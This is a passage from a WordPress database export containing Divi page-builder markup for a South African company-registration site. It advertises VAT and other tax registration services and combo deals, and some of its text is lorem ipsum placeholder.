button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Save Even More<br />You can customize your <br />package for great savings</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 14:58:35','2019-08-15 12:58:35','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32714,3,'2019-08-14 10:47:42','2019-08-14 08:47:42','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Tax Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/Asset-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.6\" width=\"54%\" max_width=\"65%\" module_alignment=\"center\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why Being Tax Compliant  Is Important?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus.</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Urgent Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/vat-registration-urgent/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/vat-registration-urgent/\"][/et_pb_blurb][et_pb_blurb title=\"Tax Clearance Certificate\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/tax-clearance-certificate/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/tax-clearance-certificate/\"][/et_pb_blurb][et_pb_blurb title=\"Import & Export Code Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/import-and-export-code-registration/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/import-and-export-code-registration/\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Salary Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/salary-tax-registration-paye/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/salary-tax-registration-paye/\"][/et_pb_blurb][et_pb_blurb title=\"Business Income Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\"][/et_pb_blurb][et_pb_blurb title=\"Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/tax-registration/vat-registration/\" link_option_url=\"https://companyregistration.online/shop/tax-registration/vat-registration/\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest  Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" 